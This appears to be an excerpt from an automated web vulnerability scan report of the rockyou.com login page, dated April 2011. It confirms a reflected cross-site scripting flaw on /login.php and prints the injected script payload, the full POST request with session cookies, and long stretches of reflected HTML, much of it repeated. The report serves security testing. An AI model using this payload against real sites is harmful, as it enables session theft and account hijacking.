Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:59:31 GMT; path=/; domain=.rockyou.com,lastlogin=1303163972; expires=Wed, 27-Jul-2011 21:59:32 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 21:59:32 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 21:59:32 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 21:59:32 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=87638 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9072
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x0006E7)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x0006E7)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="..
Date: Mon, 18 Apr 2011 21:59:32 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:59:31 GMT; path=/; domain=.rockyou.com,lastlogin=1303163972; expires=Wed, 27-Jul-2011 21:59:32 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 21:59:32 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 21:59:32 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 21:59:32 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=87638 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9072
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x0006E7)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x0006E7)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| user | POST | '"--></style></script><script>alert(0x0006EB)</script> |
| mode | POST | login |
| pass | POST | 3 |
Request
POST /login.php HTTP/1.1
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163972; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006EB)%3c%2fscript%3e&mode=login&pass=3
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163972; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006EB)%3c%2fscript%3e&mode=login&pass=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:59:35 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 11:59:35 GMT; path=/; domain=.rockyou.com,lastlogin=1303163975; expires=Wed, 27-Jul-2011 21:59:35 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 21:59:35 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 21:59:35 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 21:59:35 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=93046 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9051
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = 